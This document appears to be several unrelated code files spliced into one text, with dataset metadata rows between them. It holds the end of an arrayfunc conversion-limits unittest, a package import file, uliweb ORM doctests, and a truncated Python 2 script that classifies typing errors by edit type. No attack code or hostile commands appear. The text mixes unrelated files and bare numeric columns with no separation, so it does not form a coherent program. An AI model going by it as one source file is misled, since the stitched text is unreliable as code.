'b' : arrayfunc.arraylimits.b_min,
'B' : arrayfunc.arraylimits.B_min,
'h' : arrayfunc.arraylimits.h_min,
'H' : arrayfunc.arraylimits.H_min,
'i' : arrayfunc.arraylimits.i_min,
'I' : arrayfunc.arraylimits.I_min,
'l' : arrayfunc.arrayguardbands.LONG_MIN_GUARD_D,
'L' : 0,
'q' : arrayfunc.arrayguardbands.LLONG_MIN_GUARD_D,
'Q' : 0,
'f' : arrayfunc.arraylimits.f_min,
'd' : arrayfunc.arraylimits.d_min,
}
# Max value for when the source is a 'd' (double) array.
self.source_d_max = {
'b' : arrayfunc.arraylimits.b_max,
'B' : arrayfunc.arraylimits.B_max,
'h' : arrayfunc.arraylimits.h_max,
'H' : arrayfunc.arraylimits.H_max,
'i' : arrayfunc.arraylimits.i_max,
'I' : arrayfunc.arraylimits.I_max,
'l' : arrayfunc.arrayguardbands.LONG_MAX_GUARD_D,
'L' : arrayfunc.arrayguardbands.ULONG_MAX_GUARD_D,
'q' : arrayfunc.arrayguardbands.LLONG_MAX_GUARD_D,
'Q' : arrayfunc.arrayguardbands.ULLONG_MAX_GUARD_D,
'f' : arrayfunc.arraylimits.f_max,
'd' : arrayfunc.arraylimits.d_max,
}
# Min value for when the source is a 'f' (float) array.
self.source_f_min = {
'b' : arrayfunc.arraylimits.b_min,
'B' : arrayfunc.arraylimits.B_min,
'h' : arrayfunc.arraylimits.h_min,
'H' : arrayfunc.arraylimits.H_min,
'i' : arrayfunc.arrayguardbands.INT_MIN_GUARD_F,
'I' : arrayfunc.arraylimits.I_min,
'l' : arrayfunc.arrayguardbands.LONG_MIN_GUARD_F,
'L' : 0,
'q' : arrayfunc.arrayguardbands.LLONG_MIN_GUARD_F,
'Q' : 0,
'f' : arrayfunc.arraylimits.f_min,
'd' : arrayfunc.arraylimits.f_min,
}
# Max value for when the source is a 'f' (float) array.
self.source_f_max = {
'b' : arrayfunc.arraylimits.b_max,
'B' : arrayfunc.arraylimits.B_max,
'h' : arrayfunc.arraylimits.h_max,
'H' : arrayfunc.arraylimits.H_max,
'i' : arrayfunc.arrayguardbands.INT_MAX_GUARD_F,
'I' : arrayfunc.arrayguardbands.UINT_MAX_GUARD_F,
'l' : arrayfunc.arrayguardbands.LONG_MAX_GUARD_F,
'L' : arrayfunc.arrayguardbands.ULONG_MAX_GUARD_F,
'q' : arrayfunc.arrayguardbands.LLONG_MAX_GUARD_F,
'Q' : arrayfunc.arrayguardbands.ULLONG_MAX_GUARD_F,
'f' : arrayfunc.arraylimits.f_max,
'd' : arrayfunc.arraylimits.f_max,
}
# The maximum values for selected array types.
self.TestLimMax = {'b' : arrayfunc.arraylimits.b_max, 'B' : arrayfunc.arraylimits.B_max,
'h' : arrayfunc.arraylimits.h_max, 'H' : arrayfunc.arraylimits.H_max,
'i' : arrayfunc.arraylimits.i_max, 'I' : arrayfunc.arraylimits.I_max,
'l' : arrayfunc.arraylimits.l_max, 'L' : arrayfunc.arraylimits.L_max,
'q' : arrayfunc.arraylimits.q_max, 'Q' : arrayfunc.arraylimits.Q_max,
'f' : arrayfunc.arraylimits.f_max,
'd' : arrayfunc.arraylimits.d_max}
self.TestLimMin = {'b' : arrayfunc.arraylimits.b_min, 'B' : arrayfunc.arraylimits.B_min,
'h' : arrayfunc.arraylimits.h_min, 'H' : arrayfunc.arraylimits.H_min,
'i' : arrayfunc.arraylimits.i_min, 'I' : arrayfunc.arraylimits.I_min,
'l' : arrayfunc.arraylimits.l_min, 'L' : arrayfunc.arraylimits.L_min,
'q' : arrayfunc.arraylimits.q_min, 'Q' : arrayfunc.arraylimits.Q_min,
'f' : arrayfunc.arraylimits.f_min,
'd' : arrayfunc.arraylimits.d_min}
########################################################
def arrayguardbands(self, sourcetype, destcode, limtype):
"""Return the platform limits for each array type.
"""
if limtype == 'min':
if sourcetype == 'd':
return self.source_d_min[destcode]
else:
return self.source_f_min[destcode]
elif limtype == 'max':
if sourcetype == 'd':
return self.source_d_max[destcode]
else:
return self.source_f_max[destcode]
else:
print('Invalid limit type', limtype)
return None
########################################################
def TestLimits(self, datacode, dataoutcode):
"""Find a set of test values which are compatible with both input and output arrays.
Returns a list of data to use for test values.
"""
if (datacode in ('f', 'd')) and (dataoutcode not in ('f', 'd')):
dataoutmax = self.arrayguardbands(datacode, dataoutcode, 'max')
dataoutmin = self.arrayguardbands(datacode, dataoutcode, 'min')
else:
dataoutmax = self.TestLimMax[dataoutcode]
dataoutmin = self.TestLimMin[dataoutcode]
datamax = self.TestLimMax[datacode]
datamin = self.TestLimMin[datacode]
# Make sure the data fits within the smallest range.
maxval = min(datamax, dataoutmax)
minval = max(datamin, dataoutmin)
spread = int(maxval) - int(minval)
step = spread // 512
if step < 1:
step = 1
# Source and destination are integers, then use the full data range.
if (datacode not in ('f', 'd')) and (dataoutcode not in ('f', 'd')):
return list(range(minval, maxval + 1, step))
# Either the source or destination are floating point.
else:
tmpmin = max(minval, -512)
tmpmax = min(maxval, 511)
longdata = list(range(tmpmin, tmpmax + 1, 1))
if spread > 1024:
longdata[0] = minval
longdata[-1] = maxval
# Make sure the data is in the expected format.
if datacode in ('f', 'd'):
return [float(x) for x in longdata]
else:
return [int(x) for x in longdata]
# Calculate test limits.
TestData = testlimits()
##############################################################################
##############################################################################
if __name__ == '__main__':
# Check to see if the log file option has been selected. This is an option
# which we have added in order to decide where to output the results.
if '-l' in sys.argv:
# Remove the option from the argument list so that "unittest" does
# not complain about unknown options.
sys.argv.remove('-l')
with open('af_unittest.txt', 'a') as f:
f.write('\n\n')
f.write('convert\n\n')
trun = unittest.TextTestRunner(f)
unittest.main(testRunner=trun)
else:
unittest.main()
##############################################################################
| 32.316366
| 91
| 0.606373
| 19,392
| 173,959
| 5.369121
| 0.017378
| 0.066982
| 0.041146
| 0.055783
| 0.975893
| 0.97499
| 0.96965
| 0.969074
| 0.967806
| 0.966845
| 0
| 0.010542
| 0.138458
| 173,959
| 5,382
| 92
| 32.322371
| 0.684166
| 0.234256
| 0
| 0.910127
| 0
| 0
| 0.006176
| 0
| 0
| 0
| 0
| 0
| 0.145148
| 1
| 0.146414
| false
| 0.005485
| 0.004219
| 0
| 0.173418
| 0.000422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc8e03306ef5360edcf2bf9b7ee7ec4a98ed0eca
| 173
|
py
|
Python
|
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | 6
|
2020-01-08T05:36:09.000Z
|
2022-02-09T21:07:04.000Z
|
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | null | null | null |
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | 1
|
2021-09-11T08:12:29.000Z
|
2021-09-11T08:12:29.000Z
|
from .crossent import *
from .mse import *
from .acc import *
from .topkacc import *
from .prec import *
from .elbo import *
from .crossent_elbo import *
from .prog import *
| 21.625
| 28
| 0.728324
| 25
| 173
| 5
| 0.36
| 0.56
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179191
| 173
| 8
| 29
| 21.625
| 0.880282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bcec9d1906ca1a2f459f40329aafeccb06ab7a00
| 13,452
|
py
|
Python
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 202
|
2015-01-12T08:10:48.000Z
|
2021-11-08T09:04:32.000Z
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 30
|
2015-01-01T09:07:17.000Z
|
2021-06-03T12:58:45.000Z
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 58
|
2015-01-12T03:28:54.000Z
|
2022-01-14T01:58:08.000Z
|
import os
from uliweb import manage
from uliweb.orm import *
import uliweb.orm as orm
from uliweb.manage import make_simple_application
os.chdir('test_orm_ext')
if os.path.exists('database.db'):
os.remove('database.db')
manage.call('uliweb syncdb -v')
def test_extend_model():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> U = get_model('user')
>>> U.properties.keys()
['username', 'age', 'id']
>>> U1 = get_model('user1')
>>> U1.properties.keys()
['age', 'id']
"""
def test_dynamic_extend_model_1():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> U = create_model('user2', fields)
>>> print U.properties.keys()
['id', 'year']
"""
def test_dynamic_extend_model_2():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> U = create_model('user3', fields, basemodel='uliweb.contrib.auth.models.User')
>>> print U.properties.keys()
['username', 'locked', 'deleted', 'image', 'date_join', 'email', 'is_superuser', 'last_login', 'year', 'active', 'password', 'nickname', 'id']
>>> print hasattr(U, 'check_password')
True
"""
def test_dynamic_extend_model_3():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> U = create_model('user', fields, __replace__=True, basemodel='uliweb.contrib.auth.models.User')
>>> U = get_model('user')
>>> sql = print_model(U, skipblank=True)
>>> sql
'CREATE TABLE user (year INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));'
>>> print hasattr(U, 'check_password')
True
"""
def test_dynamic_extend_model_4():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int', '_reserved':True}
... ]
>>> U = create_model('user3', fields, basemodel='uliweb.contrib.auth.models.User')
>>> print U.properties.keys()
['username', 'locked', 'deleted', 'image', 'date_join', 'email', 'is_superuser', 'last_login', 'year', 'active', 'password', 'nickname', 'id']
>>> print hasattr(U, 'check_password')
True
"""
def test_create_model_index():
"""
>>> app = make_simple_application(project_dir='.')
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> indexes = [
... {'name':'user_idx', 'fields':['year'], 'unique':True},
... ]
>>> U = orm.create_model('user', fields, indexes=indexes,
... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
>>> U = get_model('user')
>>> print print_model(U, skipblank=True)
CREATE TABLE user (year INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
"""
def test_recreate_model():
"""
>>> app = make_simple_application(project_dir='.')
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> indexes = [
... {'name':'user_idx', 'fields':['year'], 'unique':True},
... ]
>>> U = orm.create_model('user', fields, indexes=indexes,
... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
>>> U = get_model('user')
>>> print print_model(U, skipblank=True)
CREATE TABLE user (year INTEGER, "group" INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
>>> U = orm.create_model('user', fields, indexes=indexes,
... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
>>> U = get_model('user')
>>> print print_model(U, skipblank=True)
CREATE TABLE user (year INTEGER, "group" INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
"""
def test_model_config():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> M = get_model('model_config')
>>> MH = get_model('model_config_his')
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> indexes = [
... {'name':'user_idx', 'fields':['year'], 'unique':True},
... ]
>>> from uliweb.utils.common import get_uuid
>>> from uliweb.utils import date
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=False,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
>>> m.save(version=True)
True
>>> from uliweb.contrib.model_config import find_model
>>> print find_model(None, 'user')
{'model_path': '', 'engines': ['default'], 'appname': 'uliweb.contrib.model_config'}
>>> User = get_model('user')
>>> User.migrate()
>>> u = User(username='guest', age=30, year=2014)
>>> u.save()
True
>>> a = User.get(1)
>>> print repr(a)
<User {'year':2014,'username':u'guest','age':30,'group':None,'id':1}>
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'nickname', 'type':'str'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=False,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> m = M.get(M.c.model_name=='user')
>>> m.uuid = mh.uuid
>>> m.save(version=True)
True
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'nickname', 'type':'str'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=False,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> m = M.get(M.c.model_name=='user')
>>> m.uuid = mh.uuid
>>> m.save(version=True)
True
>>> M = get_model('user')
>>> print M.properties.keys()
['username', 'group', 'year', 'age', 'nickname', 'id']
"""
def test_extension_model():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> M = get_model('model_config')
>>> MH = get_model('model_config_his')
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> indexes = [
... {'name':'user_idx', 'fields':['year'], 'unique':True},
... ]
>>> ext_fields = [
... {'name':'skill', 'type':'int'},
... {'name':'level', 'type':'int'},
... ]
>>> ext_indexes = [
... {'name':'user_ext_idx', 'fields':['skill']}
... ]
>>> from uliweb.utils.common import get_uuid
>>> from uliweb.utils import date
>>> MH.remove()
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=True,
... extension_fields=ext_fields, extension_indexes=ext_indexes,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> M.remove()
>>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
>>> m.save(version=True)
True
>>> from uliweb.contrib.model_config import find_model
>>> print find_model(None, 'user')
{'model_path': '', 'engines': ['default'], 'appname': 'uliweb.contrib.model_config'}
>>> User = get_model('user')
>>> User.remove()
>>> User.migrate()
>>> User.ext._model.migrate()
>>> User.ext._model.remove()
>>> u = User(username='guest', age=30, year=2014)
>>> u.save()
True
>>> u.ext.skill = 2
>>> u.ext.level = 3
>>> u.ext.save()
True
>>> a = User.get(1)
>>> print repr(a)
<User {'year':2014,'username':u'guest','age':30,'group':None,'id':1}>
>>> print repr(a.ext)
<User_Extension {'_parent':<OneToOne:1>,'skill':2,'level':3,'id':1}>
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'nickname', 'type':'str'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=False,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> m = M.get(M.c.model_name=='user')
>>> m.uuid = mh.uuid
>>> m.save(version=True)
True
>>> M = get_model('user')
>>> print M.properties.keys()
['username', 'group', 'year', 'age', 'nickname', 'id']
"""
def test_model_config_app():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> M = get_model('model_config')
>>> MH = get_model('model_config_his')
>>> fields = [
... {'name':'year', 'type':'int'},
... {'name':'username', 'type':'str'},
... {'name':'age', 'type':'int'},
... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
... ]
>>> indexes = [
... {'name':'user_idx', 'fields':['year'], 'unique':True},
... ]
>>> ext_fields = [
... {'name':'skill', 'type':'int'},
... {'name':'level', 'type':'int'},
... ]
>>> ext_indexes = [
... {'name':'user_ext_idx', 'fields':['skill']},
... ]
>>> from uliweb.utils.common import get_uuid
>>> from uliweb.utils import date
>>> MH.remove()
>>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
... fields=fields, indexes=indexes, has_extension=True,
... extension_fields=ext_fields, extension_indexes=ext_indexes,
... uuid=get_uuid())
>>> mh.save(version=True)
True
>>> M.remove()
>>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
>>> m.save(version=True)
True
>>> from uliweb.contrib.orm.commands import get_tables
>>> tables = []
>>> for name, t in get_tables('.').items():
... tables.append((name, t.__mapping_only__))
>>> print tables
[('model_config_his', False), ('user1', False), ('model_config', False), ('user_extension', True), ('user', True), ('usergroup', False)]
>>> tables = []
>>> for name, t in get_metadata().tables.items():
... tables.append((name, t.__mapping_only__))
>>> print tables
[('model_config_his', False), ('user1', False), ('model_config', False), ('user_extension', True), ('user', True), ('usergroup', False)]
>>> manage.call('uliweb syncdb -v')
Connection [Engine:default]:sqlite:///database.db
<BLANKLINE>
[default] Creating [1/6, uliweb] model_config_his...EXISTED
[default] Creating [2/6, uliweb] user1...EXISTED
[default] Creating [3/6, uliweb] model_config...EXISTED
[default] Creating [4/6, uliweb] user_extension...SKIPPED(Mapping Table)
[default] Creating [5/6, uliweb] user...SKIPPED(Mapping Table)
[default] Creating [6/6, uliweb] usergroup...EXISTED
"""
# app = make_simple_application(project_dir='.', reuse=False)
# set_echo(True)
# M = get_model('model_config')
# MH = get_model('model_config_his')
# fields = [
# ('year', 'int'),
# ('username', 'str'),
# ('age', 'int'),
# ('group', 'Reference', {'reference_class':'usergroup', 'collection_name':'myusers'})
# ]
# indexes = [
# ('user_idx', ['year'], {'unique':True})
# ]
# ext_fields = [
# ('skill', 'int'),
# ('level', 'int'),
# ]
# ext_indexes = [
# ('user_ext_idx', ['skill'])
# ]
# from uliweb.utils.common import get_uuid
# from uliweb.utils import date
# MH.remove()
# mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
# fields=fields, indexes=indexes, has_extension=True,
# extension_fields=ext_fields, extension_indexes=ext_indexes,
# uuid=get_uuid())
# mh.save(version=True)
#
# M.remove()
# m = M(name='user', cur_uuid=mh.uuid, submitted_time=date.now())
# m.save(version=True)
# from uliweb.contrib.orm.commands import get_tables
#
# tables = []
# for name, t in get_tables('.').items():
# tables.append((name, t.__mapping_only__))
# print tables
#
# tables = []
# for name, t in get_metadata().tables.items():
# tables.append((name, t.__mapping_only__))
# print tables
# manage.call('uliweb syncdb -v')
| 37.057851
| 146
| 0.565566
| 1,564
| 13,452
| 4.686061
| 0.095908
| 0.030564
| 0.022513
| 0.029472
| 0.883477
| 0.84691
| 0.84691
| 0.843089
| 0.828899
| 0.821531
| 0
| 0.005519
| 0.205248
| 13,452
| 362
| 147
| 37.160221
| 0.680011
| 0.860244
| 0
| 0
| 0
| 0
| 0.074738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.526316
| true
| 0
| 0.263158
| 0
| 0.789474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
4c474a5eeaa98ddbdfb98440c24a9a9d6faaa809
| 15,881
|
py
|
Python
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | 1
|
2016-01-14T12:55:24.000Z
|
2016-01-14T12:55:24.000Z
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | 1
|
2016-01-20T06:48:12.000Z
|
2016-01-20T06:48:50.000Z
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 文字単位のミスを抽出するスクリプトです。
# sys.argv[1]をcorrected_error_list.txtやun_corrected_error_list.txt、sys.argv[2]をmore_than_3_additonal_analysis_un_corrected_error.txtとします。
# アウトプットとしてadditonal_analysis_corrected_error.txtとadditonal_analysis_un_corrected_error.txtを出力し、9つの項目はそれぞれ
# 編集前単語、編集後単語、編集距離、タイピング速度、ユーザ名、誤り分類、error_string、related_string、誤りの位置
# を表している。
# 文字を削除する場合(damerau_distance_type == "del"の場合)は削除する文字をerror_string、削除する文字の一つ前の文字をrelated_stringとする。
# delの場合は削除する文字の前後をrelated_stringとした方が適切っぽい。
# 文字を挿入する場合(damerau_distance_type == "ins"の場合)は挿入する文字の一つ後の文字(飛ばした文字の代わりに入力した文字)をerror_string、挿入する文字をrelated_stringとする。
# 文字を置換する場合(damerau_distance_type == "sub"の場合)は置換される文字をerror_string、置換する文字をrelated_stringとする。
# insertion, deletion, substitution, transposition
# ins, del, sub, tra
import sys
def pair_compare():
with open(sys.argv[2], "w") as wf:
for line in open(sys.argv[1]):
damerau_distance_type = ""
error_string = ""
related_string = ""
error_position = ""
line = line.strip()
typing_list = line.split()
if int(typing_list[2]) >= 3:
wf.write(line + "\n")
elif typing_list[2] == "1":
if len(typing_list[0]) == len(typing_list[1]):
damerau_distance_type = "sub"
elif len(typing_list[0]) > len(typing_list[1]):
damerau_distance_type = "del"
else:
damerau_distance_type = "ins"
for i in range(len(typing_list[0])):
if typing_list[0][i] != typing_list[1][i]:
if damerau_distance_type == "sub":
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
elif damerau_distance_type == "del":
error_position = str(i + 1)
error_string = typing_list[0][i]
if i != 0:
related_string = typing_list[1][i - 1]
else:
related_string = "xxx"
elif damerau_distance_type == "ins":
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif i == len(typing_list[0]) - 1: # len(typing_list[0]) < len(typing_list[1])で、挿入する文字の場所が単語の最後尾だった場合
error_position = str(i + 2)
error_string = "_" # 挿入する文字の場所が最後尾だった場合
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif i == len(typing_list[1]) - 1: # len(typing_list[0]) > len(typing_list[1])で、削除する文字の場所が単語の最後尾だった場合
error_position = str(i + 2)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif typing_list[2] == "2":
if len(typing_list[0]) - len(typing_list[1]) == 2:
damerau_distance_type = "del"
error_number = 1
for i in range(len(typing_list[1])):
if typing_list[0][i] != typing_list[1][i] and error_number == 1:
error_number += 1
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i - 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
if typing_list[0][i + 1] != typing_list[1][i] and error_number == 2:
error_position = str(i + 2)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i - 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if i == len(typing_list[1]) - 1:
if error_number == 1:
error_position = str(i + 2)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
error_position = str(i + 3)
error_string = typing_list[0][i + 2]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
elif len(typing_list[0]) - len(typing_list[1]) == -2:
damerau_distance_type = "ins"
error_number = 1
for i in range(len(typing_list[0])):
if typing_list[0][i] != typing_list[1][i] and error_number == 1:
error_number += 1
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
if typing_list[0][i] != typing_list[1][i + 1] and error_number == 2:
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if i == len(typing_list[0]) - 1:
if error_number == 1:
error_position = str(i + 2)
error_string = "_"
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
error_position = str(i + 3)
error_string = "_"
related_string = typing_list[1][i + 2]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
elif len(typing_list[0]) - len(typing_list[1]) == 0:
tra_flag = 0
sub_flag = 0
ins_flag = 0
del_flag = 0
for i in range(len(typing_list[0])):
if typing_list[0][i] != typing_list[1][i]:
if typing_list[0][i] == typing_list[1][i + 1] and typing_list[0][i + 1] == typing_list[1][i]:
damerau_distance_type = "tra"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
tra_flag = 1
break
sub_count = 0
for i in range(len(typing_list[0])):
if typing_list[0][i] != typing_list[1][i]:
sub_count += 1
if tra_flag == 0 and sub_count == 2:
sub_flag = 1
damerau_distance_type = "sub"
for i in range(len(typing_list[0])):
if typing_list[0][i] != typing_list[1][i]:
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
if tra_flag == 0 and sub_flag == 0:
for i in range(len(typing_list[0])):
if ins_flag == 0 and del_flag == 0 and typing_list[0][i] != typing_list[1][i]:
if typing_list[0][i + 1] == typing_list[1][i]:
del_flag = 1
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i - 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
else:
ins_flag = 1
damerau_distance_type = "ins"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
if del_flag == 1 and typing_list[0][i + 1] != typing_list[1][i]:
damerau_distance_type = "ins"
error_position = str(i + 1)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if ins_flag == 1 and typing_list[0][i] != typing_list[1][i + 1]:
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if ins_flag == 1 and i == len(typing_list[0]) - 2:
damerau_distance_type = "del"
error_position = str(i + 2)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if del_flag == 1 and i == len(typing_list[0]) - 2:
damerau_distance_type = "ins"
error_position = str(i + 2)
error_string = "_"
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif len(typing_list[0]) - len(typing_list[1]) == 1:
del_flag = 0
sub_flag = 0
for i in range(len(typing_list[1])):
if del_flag == 0 and sub_flag == 0 and typing_list[0][i] != typing_list[1][i]:
if i == len(typing_list[1]) - 1 or typing_list[0][i + 1] != typing_list[1][i + 1] and typing_list[0][i + 1] != typing_list[1][i]:
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i - 1]
